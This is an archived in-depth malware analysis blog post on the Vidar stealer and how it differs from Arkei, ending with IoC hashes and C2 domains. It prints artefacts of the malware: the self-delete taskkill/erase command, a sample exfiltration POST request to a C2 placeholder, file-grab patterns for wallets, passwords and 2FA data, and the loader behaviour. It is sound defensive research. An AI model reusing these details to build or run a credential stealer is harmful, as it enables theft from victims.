{
	"id": "477fec8c-a94d-497c-8ec8-f746cde49d85",
	"created_at": "2026-04-06T00:16:09.428645Z",
	"updated_at": "2026-04-10T03:36:48.119313Z",
	"deleted_at": null,
	"sha1_hash": "e31b1c0e40564c90b26bfdbcab36d5abf32b9a7c",
	"title": "Let’s dig into Vidar – An Arkei Copycat/Forked Stealer (In-depth analysis)",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 6490466,
	"plain_text": "Let’s dig into Vidar – An Arkei Copycat/Forked Stealer (In-depth\r\nanalysis)\r\nPublished: 2018-12-24 · Archived: 2026-04-05 20:23:47 UTC\r\nSometimes when you are reading tons and tons of log of malware analysis, you are not expecting that some little changes\r\ncould be in fact impactful.\r\nI paid the price when I was analyzing a supposed Arkei malware. my Yara rule at that time was supposed to trigger this\r\nmalware, but after some reversing, I realized that I was confronted with something different. Some strings linked to Arkei\r\nsignature was deleted and a new one appeared with the string “Vidar”, there are also some other tweaks in the in-depth\r\nanalysis that proves there are some differences (but small), but all the rest was totally identical to Arkei.\r\nThe malware is written in C++, seems to have started activities at the beginning of October 2018 and have all the kind of\r\nclassic features of stealers:\r\nSearching for specific documents\r\nStealing ID from cookie browsers\r\nStealing browser histories (also from tor browser)\r\nStealing wallets\r\nStealing data from 2FA software\r\nGrabbing message from messenger software\r\nScreenshot\r\nLoader settings\r\nTelegram notifications (on server-side)\r\nGet a complete snapshot of all information of the computer victim\r\nSold with a range of 250-700$, this stealer on shop/forums and when people buy it, they have access to a C2 Shop portal\r\nwhere they are able to generate their own payloads. So there is no management on their side. Also, domains who leads to the\r\nC2/Shop are changed every 4 days.\r\nFor this in-depth analysis, I will inspect the 4.1 version of Vidar, take an overview of the admin panel, catching the\r\ndifferences with Arkei.\r\nBasic Countries by-passing\r\nSo first of all, we have some classic pattern to quit the program if the victim machines are configured in some language with\r\nthe help of GetUserDefaultLocaleName. 
This is one of the easy tricks used to make sure the malware does not infect users from specific countries.\r\nAs explained in the MSDN, a “locale” is a collection of language-related user preference information represented as a list of values; the stealer will check if the language corresponds to one of the countries in the list mentioned below.\r\nhttps://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/\r\nPage 1 of 36\n\nWith a few seconds of searching on Google, it’s easy to understand which countries are behind the locale names:\r\nLocale Country\r\nru-RU Russia\r\nbe-BY Belarus\r\nuz-UZ Uzbekistan\r\nkk-KZ Kazakhstan\r\naz-AZ Azerbaijan\r\nLCID Structure – https://msdn.microsoft.com/en-us/library/cc233968.aspx\r\nLanguage Code Table – http://www.lingoes.net/en/translator/langcode.htm\r\nLocaleName – https://docs.microsoft.com/fr-fr/windows/desktop/Intl/locale-names\r\nLocale – https://docs.microsoft.com/fr-fr/windows/desktop/Intl/locales-and-languages\r\nMutex generation\r\nThe mutant (mutex) string generated by Vidar is unique for each victim, but it is simple to understand how it is generated. 
This is just a concatenation of two strings:\r\nHardware Profile ID\r\nGetCurrentHwProfileA is used to retrieve the current hardware profile of the computer, and the value of szHwProfileGuid is taken from it. If it fails, “Unknown” is used here instead.\r\nThe Machine GUID\r\nWith the help of RegOpenKeyExA, the value of this registry key is fetched:\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid\r\nThis is the UUID created by Windows during the installation of the operating system.\r\nWhen it’s done, the mutex is created, just like this:\r\nString setup\r\nWhen Vidar enters the main function, it needs to store some required strings to be able to work properly in some further steps.\r\nThe RVA addresses of all the strings are stored in the .data section. The malware will go there to access the requested string.\r\nThis is a trick to slow down the static analysis of the malware, but it is really easy to surpass 🙂\r\nC2 Domain \u0026 Profile ID\r\nWhen the malware is generated by the builder in the customer area, a unique ID is hardcoded into it. When Vidar requests this value on the malicious domain, it will retrieve the corresponding profile describing what the threat actor wants to grab/steal on the victim machine.\r\nSo in this case, the profile ID is “178”. 
If there is no config in the malware, the profile ID “1” is hardcoded into it.\r\nThe C2 domain is a simple XORed string; the key is directly put into the XOR function to decrypt the data.\r\nOnce decrypted, it’s in fact “newagenias.com”.\r\nConfigs can be extracted easily with the script izanami.py on my GitHub repository.\r\nHow to understand the config format\r\nFor example, this is the default configuration the malware could get from the C2:\r\n1,1,1,1,1,1,1,1,1,1,250,Default;%DESKTOP%\\;*.txt:*.dat:*wallet*.*:*2fa*.*:*backup*.*:*code*.*:*password*.*:*auth*.*:*google*.*:*utc*.*:*UTC*.\r\nEach part is delimited by “;”, so let’s dig into it.\r\nFirst part\r\n1 Saved passwords\r\n1 Cookies / AutoFill\r\n1 Wallets\r\n1 Internet history\r\n1 ??? – Supposed to be Skype (not implemented)\r\n1 ??? – Supposed to be Steam (not implemented)\r\n1 Telegram\r\n1 Screenshot\r\n1 Grabber\r\n1 ???\r\n250 Max size (kb)\r\nDefault Name of the profile (also used for the archive file in the files repository)\r\nSecond part\r\n%DESKTOP% Selected folder where the grabber feature will search, recursively or not, for some selected data\r\nThird part\r\n*.txt:*.dat:*wallet*.*:*2fa*.*:*backup*.*:*code*.*:*password*.*:*auth*.*:*google*.*:*utc*.*:*UTC*.*:*crypt*.*:*key*.*\r\nThe file name patterns that the grabber searches for, delimited by “:”.\r\nFourth part\r\n50 Max size per file (kb)\r\ntrue Collect recursively\r\nFifth part:\r\nmovies:music:mp3;\r\nThis is the exception part: the grabber will skip the files whose path matches one of those strings while searching recursively in the selected folder.\r\nThe setup is quite a mess if we look into the code. 
Each option is stored in a byte or dword variable.\r\nFolder generation\r\nTo summarize, the set of files/folders that can be generated in the malicious repository is in fact pretty simple:\r\n\\\\files \u003c- Master folder\r\n\\\\files\\\\Autofill \u003c- Auto-fill files\r\n\\\\files\\\\CC \u003c- Credit cards\r\n\\\\files\\\\Cookies \u003c- Cookies\r\n\\\\files\\\\Downloads \u003c- Download history from browsers\r\n\\\\files\\\\Files \u003c- Profile configs (archives)\r\n\\\\files\\\\History \u003c- Browser histories\r\n\\\\files\\\\Soft \u003c- Master folder for targeted software\r\n\\\\files\\\\Soft\\\\Authy \u003c- 2FA software\r\n\\\\files\\\\Telegram \u003c- Telegram messages\r\n\\\\files\\\\Wallets \u003c- Crypto wallets\r\nGeneral files\r\n\\\\files\\\\screenshot.jpg \u003c- Screenshot of the screen at execution time\r\n\\\\files\\\\passwords.txt \u003c- All passwords consolidated at once\r\n\\\\files\\\\information.txt \u003c- Snapshot of the computer setup\r\nLibraries necessary to grab some data\r\nSomething that I love when I read malware specs is when they say that the product can be launched without needing runtime libraries or other required software on the machine. 
But when you dig into the code or just watch some network flows, you can see that the malware downloads some DLLs to be able to do some tasks.\r\nIn this case, they are required during the stealing process for different kinds of browsers.\r\nfreebl3.dll Freebl library for NSS (Mozilla browsers)\r\nmozglue.dll Mozilla browser library\r\nmsvcp140.dll Visual C++ Runtime 2015\r\nnss3.dll Network Security Services (NSS) library (Mozilla browsers)\r\nsoftokn3.dll Mozilla browser library\r\nvcruntime140.dll Visual C++ Runtime 2015\r\nThey are deleted when the task is done.\r\nFTP\r\nList of supported software\r\nFileZilla\r\nWinSCP\r\n2FA software\r\nSomething that I found interesting in this malware is that 2FA software is also targeted, a feature that I had not really seen in the wild, and I am pretty sure this will become more and more common in the future with the multiplication of those kinds of protections. Victims must understand that 2FA is not the ultimate way to protect accounts from hackers; it could also be another door for vulnerabilities 🙂\r\nSo with Vidar, the Authy software is targeted…\r\nMore specifically, the SQLite file of the corresponding application in the %APPDATA% repository. 
It looks like this is the same mode of operation as when a stealer wants to steal data from software like Discord or Chrome.\r\nSo guys, be careful with your 2FA software 🙂\r\nBrowsers\r\nSomething interesting to mention: this bad boy is also stealing Tor Browser data.\r\nList of supported browsers\r\n360 Browser\r\nAmigo\r\nBlackHawk\r\nCent Browser\r\nChedot Browser\r\nChromium\r\nCocCoc\r\nComodo Dragon\r\nCyberfox\r\nElements Browser\r\nEpic Privacy\r\nGoogle Chrome\r\nIceCat\r\nInternet Explorer\r\nK-Meleon\r\nKometa\r\nMaxthon5\r\nMicrosoft Edge\r\nMozilla Firefox\r\nMustang Browser\r\nNichrome\r\nOpera\r\nOrbitum\r\nPale Moon\r\nQIP Surf\r\nQQ Browser\r\nSputnik\r\nSuhba Browser\r\nTor Browser\r\nTorch\r\nURAN\r\nVivaldi\r\nWaterfox\r\nOf course, this list could be larger than this, since other browsers based on the Chromium code base may also be affected.\r\nMessengers/Mailers\r\nI will not explain here how it works, but the technique is the same as the one I’ve explained in my previous blog post (especially for the Telegram part).\r\nBat!\r\nPidgin\r\nTelegram\r\nThunderbird\r\nWallets\r\nAnoncoin\r\nBBQCoin\r\nBitcoin\r\nDashCore\r\nDevCoin\r\nDigitalCoin\r\nElectron Cash\r\nElectrumLTC\r\nEthereum\r\nExodus\r\nFlorinCoin\r\nFrancoCoin\r\nJAXX\r\nLitecoin\r\nMultiDoge\r\nTerraCoin\r\nYACoin\r\nZcash\r\nOf course, this list could change if the customer adds some additional files to search for in specific areas of the victim machine.\r\nGrabber\r\nThe grabber feature is by far the most complicated feature of the malware, and the one that looks really different from Arkei in terms of implementation.\r\nSo first of all, it checks in the downloaded config file whether this feature is activated, and skips it if not. 
Then it prepares the strings for creating the folder path, and when all is set, func_grabber can be used.\r\nWhen inspecting func_grabber, I was not prepared for this:\r\nWhen I saw this, I was not really happy to reverse it. I mean, I knew I was falling into some unexpectedly allocated memory in my brain. I had all the magnificent stuff that every malware reverser loves (or not at all):\r\nWeird conditions coming out of the blue\r\nFunctions calling other functions like Russian wooden dolls\r\nAPI calls\r\netc…\r\nBut if we look at this from a macro view, it is in fact easier than it looks. I will show just one example.\r\nSo in the example below, if the string %APPDATA% is present in the config downloaded from the C2, it enters the function and starts a bunch of verifications, until entering the most important one, called func_VidarSearchFile.\r\nAfterwards, the process remains almost the same for each scenario.\r\nThese are at least all the repositories available in the grabber feature:\r\n%ALL_DRIVES% (GetDriveTypeA necessary)\r\n%APPDATA%\r\n%C%\r\n%D%\r\n%DESKTOP%\r\n%DOCUMENTS%\r\n%DRIVE_FIXED%\r\n%DRIVE_REMOVABLE%\r\n%LOCALAPPDATA%\r\n%USERPROFILE%\r\nScreenshot\r\nThe generation of the screenshot is easy to understand:\r\nFirst, the GdiplusStartup function is called to initialize Windows GDI+.\r\nThen, as an alternative to GetDeviceCaps, GetSystemMetrics is called with the value SM_CYSCREEN (1) to get the height of the screen on the display monitor, and with SM_CXSCREEN (0) for the width.\r\nNow, it needs a DC 
object for creating a compatible bitmap, which is necessary to generate our image: the window DC is selected into the compatible memory DC and a bit block transfer API function (BitBlt) is used to transfer the data. When all is done, it enters func_GdipSaveImageToFile.\r\nNow the bits from the generated bitmap need to be collected and copied into a buffer that will produce the screen capture file.\r\nInformation Log\r\nSo let’s dig into information.txt to understand how this file is generated. I will mention only some parts of its creation; for the other parts, I will just give the corresponding API call. Set a breakpoint on these APIs if you want to take your time to analyze all the steps easily.\r\nFirst, it indicates which version of Vidar is used.\r\nIf you don’t see a Vidar version in the log file, it means that you have an early version of it.\r\nDate GetSystemTimeAsFileTime\r\nMachineID Explained above\r\nGUID GetCurrentHwProfileA\r\nPath GetModuleFileNameExA\r\nWork Dir Hardcoded string + func_FolderNameGeneration\r\nGetting the name of the operating system and the platform is classic, because this is in fact a concatenation of two things. 
First, with RegOpenKeyExA, the value of this registry key is fetched:\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProductName\r\nSecondly, to know if Windows is 32 or 64-bit, it checks whether it is itself running under WOW64 with the help of IsWow64Process.\r\nComputer Name GetComputerNameA\r\nUser Name GetUserNameA\r\nFor the current screen resolution, CreateDCA is called to create a device context for “DISPLAY”, then the width and height of the device are requested with GetDeviceCaps.\r\nThis corresponds to this source code:\r\n#include \u003cwindows.h\u003e\r\nHDC hDC = CreateDCA(\"DISPLAY\", NULL, NULL, NULL); // device context for the whole display\r\nint width = GetDeviceCaps(hDC, HORZRES); // HORZRES = 0x8\r\nint height = GetDeviceCaps(hDC, VERTRES); // VERTRES = 0x0A\r\nDeleteDC(hDC); // release the device context\r\nLet’s continue our in-depth analysis…\r\nDisplay Language GetUserDefaultLocaleName\r\nKeyboard Languages GetKeyboardLayoutList / GetLocaleInfoA\r\nLocal Time GetSystemTimeAsFileTime\r\nTimeZone TzSpecificLocalTimeToSystemTime\r\nHardware\r\nProcessor For the processor name, the value of this registry key is fetched:\r\nHKEY_LOCAL_MACHINE\\HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\ProcessorNameString\r\nCPU Count GetSystemInfo.dwNumberOfProcessors\r\nRAM GlobalMemoryStatusEx\r\nVideoCard EnumDisplayDevicesW\r\nNetwork\r\nThe network part is quite easy: it’s a translation of the data retrieved from ip-api.com/line/, put into the log at the corresponding place.\r\nProcesses\r\nThere is quite some stuff done to get a snapshot of all the processes at the time the stealer is executed. But in the end, the different steps are not complicated at all to understand.\r\nIt requests CreateToolhelp32Snapshot to get a complete snapshot of all the running processes, and reads them one by one in a loop starting with Process32First.\r\nAfter checking if it’s a parent process or a child process, Vidar grabs two values of the PROCESSENTRY32 object:\r\nth32ProcessID: PID\r\nszExeFile: the name of the PE\r\nSoftware\r\nFor the list of all installed software, the value of this registry key is fetched:\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\r\nAnd these values are retrieved for each piece of software:\r\nDisplayName\r\nDisplayVersion\r\nResults\r\nSo for example, if you want to see the results, let’s look at the information.txt generated in one sandbox analysis (this is a Vidar 4.2 here):\r\nVidar Version: 4.2\r\nDate: Thu Dec 13 14:39:05 2018\r\nMachineID: 90059c37-1320-41a4-b58d-2b75a9850d2f\r\nGUID: {e29ac6c0-7037-11de-816d-806e6f6e6963}\r\nPath: C:\\Users\\admin\\AppData\\Local\\Temp\\toto.exe\r\nWork Dir: 
C:\\ProgramData\\LDGQ3MM434V3HGAR2ZUK\r\nWindows: Windows 7 Professional [x86]\r\nComputer Name: USER-PC\r\nUser Name: admin\r\nDisplay Resolution: 1280x720\r\nDisplay Language: en-US\r\nKeyboard Languages: English (United States)\r\nLocal Time: 13/12/2018 14:39:5\r\nTimeZone: UTC-0\r\n[Hardware]\r\nProcessor: Intel(R) Core(TM) i5-6400 CPU @ 2.70GHz\r\nCPU Count: 4\r\nRAM: 3583 MB\r\nVideoCard: Standard VGA Graphics Adapter\r\n[Network]\r\nIP: 185.230.125.140\r\nCountry: Switzerland (CH)\r\nCity: Zurich (Zurich)\r\nZIP: 8010\r\nCoordinates: 47.3769,8.54169\r\nISP: M247 Ltd (M247 Ltd)\r\n[Processes]\r\n- System [4]\r\n---------- smss.exe [264]\r\n- csrss.exe [344]\r\n\u003c ... \u003e\r\n[Software]\r\nAdobe Flash Player 26 ActiveX [26.0.0.131]\r\nAdobe Flash Player 26 NPAPI [26.0.0.131]\r\nAdobe Flash Player 26 PPAPI [26.0.0.131]\r\n\u003c ... \u003e\r\nLoader\r\nThe task is rudimentary but enough to do the job:\r\nGenerate a random name for the downloaded payload\r\nDownload the payload\r\nExecute it\r\nWhen the binary file is downloaded from the C2, CreateFileA is called with these specific parameters:\r\nedi : The downloaded data from the C2\r\n80h : “The file does not have other attributes set. 
This attribute is valid only if used alone.” (FILE_ATTRIBUTE_NORMAL)\r\n2 : CREATE_ALWAYS, which forces overwriting if the filename already exists.\r\nedi : ???\r\n1 : FILE_SHARE_READ, “Enables subsequent open operations on a file or device to request read access. Otherwise, other processes cannot open the file or device if they request read access.”\r\n40000000h : Write access (GENERIC_WRITE)\r\nebp+lpFileName : The generated filename\r\nWhen it’s done, it only needs to write the content into the file (WriteFile) and then close the corresponding handle (CloseHandle).\r\nNow that the file is downloaded and saved on disk, it only needs to be launched with ShellExecuteA. So don’t hesitate to put a breakpoint on this API function to grab the payload before it’s too late for further analysis.\r\nKilling Part\r\nSo when all the tasks of the stealer are finally accomplished and cleaned up, the stealer needs to erase itself. 
So first of all, it retrieves its own PID with the help of GetCurrentProcessId.\r\nWhen it’s done, it enters “func_GetProcessIdName” and tries to open a handle on its own process with OpenProcess; if that fails, it continues checking, and in the end the most important task here is to call GetModuleBaseNameA, which permits it to retrieve the process name with the help of the PID obtained before.\r\nSome strings that are hardcoded in the .rdata section are fetched and saved for future purposes.\r\nWhen the request is finely crafted, Vidar simply uses ShellExecuteA to pop a command shell and execute the task; this permits it to erase all traces of the payload’s presence on the machine.\r\nSo if we want a quick overview of the executed command:\r\n“C:\\Windows\\System32\\cmd.exe” /c taskkill /im vidar.exe /f \u0026 erase C:\\Users\\Pouet\\AppData\\Local\\Temp\\vidar.exe \u0026 exit\r\nLiterally:\r\nOffset File + db ‘/c taskkill /im’ + [GetModuleBaseNameA] + db ‘ /f \u0026 erase’ + [GetModuleFileNameExA + GetModuleBaseNameA] + db ‘ \u0026 exit’\r\nSending archive to the C2\r\nFolder generation\r\nCOUNTRY + “_” + Machine GUID + “.zip”\r\nFor example:\r\nNG_d6836847-acf3-4cee-945d-10c9982b53d1.zip\r\nLast POST request\r\nDuring the generation of the POST request, the generated HTTP packet is tweaked to add some additional content that the C2 server will read and process.\r\nEach name at the end of the string is the corresponding field to be saved into the database. 
These are at least all the different Content-Disposition fields that are added to the HTTP request.\r\nhwid Hardware ID\r\nos Operating system\r\nplatform 32 or 64-bit system\r\nprofile C2 profile ID\r\nuser Name of the victim account\r\ncccount Number of credit cards stolen\r\nccount Number of coins stolen (crypto wallets)\r\nfcount Number of files stolen\r\ntelegram Telegram 🙂\r\nver The version of the Vidar malware\r\nAlso, there is a little trick here that I found nice: the answer to the POST request in fact contains the config for the loader.\r\nIf there is nothing, the response is “ok”.\r\nIf there is something, the specified URL(s) are stored.\r\nIt’s the same mechanism as used for the config and the network information.\r\nExample with a sandbox:\r\nThe POST request\r\nThe response to this POST request (select the tab)\r\nServer-Side\r\nBecause it’s easy to find some information about the stealer, there is no need to dig hard to find some marketplace where Vidar is sold. So let’s see how it looks by watching a classic commercial video made for attracting possible customers (all the screenshots are collected from there). 
This could be completely different now, but it’s what it looked like at the beginning of November.\r\nLogin\r\nDashboard\r\nThe panel is a classic fancy user-friendly interface, with all the basic information necessary for the customer to have a fast view of how his business is goin’:\r\nThe current version of the builder\r\nUntil when he is able to generate payloads\r\nHow many victims\r\nThe current balance on his account, to re-subscribe again\r\nLogs\r\nSomething to mention about the log part is that it’s possible to put some notes on each entry.\r\nPasswords\r\nBuilder\r\nThe builder tab is also pretty interesting, because we have the changelog information about the stealer, and on the download part, the generated malware is not packed; this is the same scenario as with Arkei.\r\nThe customer/threat actor must use his own crypter/packer software for his payload.\r\nSettings\r\nThe most important tab is obviously the one where it is possible to configure the payload, for grabbing some additional stuff on the machine with the profiles, and to activate or deactivate some features to tune the stealer for really specific purposes.\r\nIt’s also important to note that with Vidar it’s possible to deploy multiple profiles at the same time. It means that when the payload infects the victim machine, one archive per profile is saved in the “files” repository. 
The customer is then able to easily sort the grabbed data afterwards for malicious purposes.\r\nWhen editing or creating a new rule, this prompt panel appears; it relates to what was explained above, with all the possible paths that the malware is able to search for the selected files.\r\nAfter checking a little, there are plenty of profiles on the C2. This is what we could find:\r\nDefault empty config:\r\n1,1,1,1,1,1,1,1,0,1,250,none;\r\nDefault initialized config:\r\n1,1,1,1,1,1,1,1,1,1,250,Default;%DESKTOP%\\;*.txt:*.dat:*wallet*.*:*2fa*.*:*backup*.*:*code*.*:*password*.*:*au\r\nExamples of custom profiles:\r\n1,1,1,1,1,1,1,1,1,1,250,grabba;%DESKTOP%\\;*.txt:*.dat:*wallet*.*:*2fa*.*:*backup*.*:*code*.*:*password*.*:*aut\r\n1,1,0,1,1,1,1,1,1,1,250,инфа;%DESKTOP%\\;*.txt:*.dat:*wallet*.*:*2fa*.*:*backup*.*:*code*.*:*password*.*:*auth\r\n1,1,1,1,1,1,1,1,1,1,250,Первое;%DESKTOP%\\;*.txt:*wallet*.*:*2fa*.*:*backup*.*:*code*.*:*password*.*;50;true;m\r\n1,1,1,1,1,1,1,1,1,1,250,123435566;%DESKTOP%\\;*.txt:*.dat:*wallet*.*:*2fa*.*:*backup*.*:*code*.*:*password*.*:*\r\n1,1,1,1,1,1,1,1,1,1,250,Default;%DESKTOP%\\;*.txt:*.dat:*wallet*.*:*2fa*.*:*backup*.*:*code*.*:*password*.*:*au\r\nThere is also the possibility to see multiple profiles executed at the same time:\r\n1,1,1,1,1,1,0,1,1,1,250,\r\nDESKTOP;%DESKTOP%\\;*.txt:*.dat:*wallet*.*:*2fa*.*:*2fa*.png:*backup*.*:*code*.*:*password*.*:*auth*.*:*google*\r\nDOCUMENTS;%DOCUMENTS%\\;*.txt:*.dat:*wallet*.*:*2fa*.*:*backup*.*:*code*.*:*password*.*:*auth*.*:*google*.*:*ut\r\nDRIVE_REMOVABLE;%DRIVE_REMOVABLE%\\;*.txt:*.dat:*wallet*.*:*2fa*.*:*backup*.*:*code*.*:*password*.*:*auth*.*:*g\r\nThey are in fact delimited with the specific format detailed above. 
So here, we have 3 profiles:\r\nDESKTOP\r\nDOCUMENTS\r\nDRIVE_REMOVABLE\r\nwhich will be stored in their respective archives in the “files” repository.\r\nNote: All dumped profiles are available on my GitHub repository.\r\nFinally, this quick analysis of the panel shows something that is more and more common nowadays with stealers: a loader feature, for pushing other malware.\r\nAs mentioned in the introduction, this is a shop where customers just have to configure their malware; everything is managed by a team (?) behind it, for the maintenance and for avoiding proxy filtering, and domains are changed regularly (it’s also easy to check this on the samples, because it looks like a new version means a newly generated domain).\r\nAlso, there is some possibility (from what they say) to have 2FA authentication on their account page.\r\nSome fancy message\r\nIf we search for some stuff on the login panel, we get a sympathetic message.\r\nLet’s see what we have behind it 🙂\r\nA kind of easter egg to remind us of the meaning of Vidar: “the God of Vengeance” in Norse mythology.\r\nVidar – An Arkei copycat?\r\nIf we look at the requests and the code, Vidar is almost identical to Arkei. There are slight differences at some points, but all the implemented features are the same. This could mislead some blue team people if they don’t pay too much attention to it in sandbox results. Current Yara rules will trigger on Vidar as Arkei, so automated attributions lead to mistakes at the time of this review. 
Analyzing the code is mandatory here to understand what’s goin’ on.\r\nAt first, the main function of both of them is similar:\r\nThe archive generation is also the same, so it is not with this information that it’s possible to differentiate these two malware families.\r\nCode differences\r\nAn easy way to know if we are dealing with Vidar is to find “Vidar.cpp”.\r\nVidar signature\r\nArkei signature\r\nNetwork differences\r\nAn analyst can easily be duped by the requests and think that Arkei has another form of HTTP requests, but it does not.\r\nVidar HTTP Requests\r\n/ (i.e. 162) \u003c- Config\r\nip-api.com/line/ \u003c- Get network info\r\n/msvcp140.dll \u003c- Required DLL\r\n/nss3.dll \u003c- Required DLL\r\n/softokn3.dll \u003c- Required DLL\r\n/vcruntime140.dll \u003c- Required DLL\r\n/ \u003c- Pushing victim archive to C2\r\nThere are no libraries downloaded by Arkei; this is something really specific to Vidar, for some parts of the stealing process.\r\nArkei HTTP Requests\r\n/index.php \u003c- Config\r\nip-api.com/line/ \u003c- Get network info\r\n/index.php \u003c- Pushing victim archive to C2\r\nConfig Format\r\nIf you want to understand the purpose of each field in the config format for Arkei:\r\n1 Saved passwords\r\n1 Cookies / Autofill\r\n1 History\r\n2 CryptoCurrency\r\n2 Skype\r\n2 Steam\r\n1 Telegram\r\n1 Screenshot\r\n1 Grabber\r\ntxt:log: Grabber config\r\n50 Max size (kb)\r\n2 Self delete\r\nAlso, there are some slight changes in the last POST request: Vidar is just adding new fields like the profile and the versioning.\r\nTo understand how similar the requests look, let’s dig into 
a PCAP file. I indicated the differences in red, and apart from the versioning and profile values, all the rest is the same. But if we dig into some older samples, it’s impossible to see the differences except for the path of the request.\r\nLast POST request – Vidar\r\nPOST / HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbi\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 66809\r\nHost: some.lovely.vidar.c2.with.love\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n--1BEF0A57BE110FD467A\r\nContent-Disposition: form-data; name=\"hwid\"\r\n90059c37-1320-41a4-b58d-2b75a9850d2f\r\n--1BEF0A57BE110FD467A\r\nContent-Disposition: form-data; name=\"os\"\r\nWindows 7 Professional\r\n--1BEF0A57BE110FD467A\r\nContent-Disposition: form-data; name=\"platform\"\r\nx86\r\n--1BEF0A57BE110FD467A\r\nContent-Disposition: form-data; name=\"profile\"\r\nXXX \u003c- Random Int\r\n--1BEF0A57BE110FD467A\r\nContent-Disposition: form-data; name=\"user\"\r\nadmin\r\n--1BEF0A57BE110FD467A\r\nContent-Disposition: form-data; name=\"cccount\"\r\n0\r\n--1BEF0A57BE110FD467A\r\nContent-Disposition: form-data; name=\"ccount\"\r\n0\r\n--1BEF0A57BE110FD467A\r\nContent-Disposition: form-data; name=\"fcount\"\r\n0\r\n--1BEF0A57BE110FD467A\r\nContent-Disposition: form-data; name=\"telegram\"\r\n0\r\n--1BEF0A57BE110FD467A\r\nContent-Disposition: form-data; name=\"ver\"\r\n4.1\r\n--1BEF0A57BE110FD467A\r\nContent-Disposition: form-data; name=\"logs\"; filename=\"COUNTRY_.zip\"\r\nContent-Type: zip\r\nFeatures differences\r\nWhen we dig into the different features, there is some config part in Vidar that is in fact just 
some placebo options. in an\r\nexample, the Steam stealing feature is implemented in Arkei is not found in Vidar. This is also the same thing with Skype\r\nbut in contrary 2FA stealing stuff is only on Vidar (with what I have seen on samples in my possession).\r\nStrings only present in Arkei and not in the Vidar that I analyzed\r\nIs Arkei still active and maintained?\r\nOn one of the selling page of this stealer, it’s still sold and continue to be updated. For example, it reveals that soon a final\r\nupdate on it will be pushed (v10). So let’s see how this will turn.\r\nThe Vidar Cracked Version\r\nhttps://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/\r\nPage 32 of 36\n\nThere is also in the wild a cracked version that was already spotted by some people on twitter. This Vidar or “Anti-Vidar” as\r\ncalled in the source code of the panel and It’s based on an early Vidar build (v2.3 it seems).\r\nLogin\r\nThe login is identical to the Android Lokibot panel (thanks to @siri_urz). 
As always when confronted at this kind of stuff,\r\nthe code never lies (or it seems) for helping us to identify what is the real C2/Malware.\r\nProfile code\r\nThe profile is far more simple than the nowadays panels and samples, the default profile is hardcoded on the PHP file, and\r\nwill get it if the value is 11.\r\nIoCs\r\nSHA256 Hashes\r\n3A20466CC8C07638B8882CCC9B14C08F605F700F03D388CF85B2E76C51D64D65\r\n0E982A02D754588D4EE99F30084B886B665FF04A1460D45C4FD410B04B10A8AF\r\n2679FA8E9FD0C1F6F26527D53759BB596FDA43A741B4DFCC99A8C0907836A835\r\n9EC586B07961E0C93C830DD1C47598FE21277432F11809A4B73DF7370CDD2E29\r\n42C6950CA57D8805C217E3334158DAB4CC71A50C94D77F608B1C442BFD2B01CA\r\nD71F81EDF8AC04639D3B7C80AA178DF95C2CBFE73F81E931448A475FB771267A\r\nDAD5FCEAB002791DD6FD575782C173F1A39E0E7CE36E6DE1BAEFA95D0A8FB889\r\n66162E69CA30A75E0DD1A6FBB9028FCFBE67B4ADE8E844E7C9FF2DCB46D993D8\r\nEFF272B93FAA1C8C403EA579574F8675AB127C63ED21DB3900F8AB4FE4EC6DA9\r\nEDBAC320C42DE77C184D30A69E119D27AE3CA7D368F802D2F8F1DA3B8D01D6DD\r\nB1D5B79D13F95A516ABBCC486841C8659984E5135F1D9C74343DCCD4390C3475\r\n543AEE5A5435C77A8DE01433079F6381ADB4110F5EF4350E9A1A56B98FE40292\r\n65B2BD17E452409397E2BD6F8E95FE8B708347D80074861698E4683BD12437A9\r\n47E89F2C76D018D4952D421C5F1D603716B10E1712266DA32F63082F042F9C46\r\n5D37323DA22C5414F6E03E06EFD184D7837D598C5E395E83C1BF248A7DE57155\r\n5C0AF9C605AFD72BEF7CE8184BCCC9578EDB3A17498ACEBB74D02EB4AF0A6D2E\r\n65287763245FDD8B56BB72298C78FEA62405BD35794A06AFBBE23CC5D38BE90A\r\n20E92C2BF75C473B745617932F8DC0F8051BFC2F91BB938B2CC1CD808EBBC675\r\nC752B68F3694B2FAAB117BCBA36C156514047B75151BBBFE62764C85CEF8ADE5\r\nAE2EBF5B5813F92B0F7D6FCBADFA6E340646E4A776163AE86905E735A4B895A0\r\n8F73E9C44C86D2BBADC545CED244F38472C5AACE0F75F57C8FC2398CE0A7F5A1\r\nthx @benkow_ for the help to find some samples 🙂\r\nDomains\r\nmalansio.com\r\nnasalietco.com\r\nbinacoirel.com\r\nnewagenias.com\r\nbokolavrstos.com\r\nnaicrose.com\r\nbenderio.com\r\ncool3dmods.com\r\nMITRE 
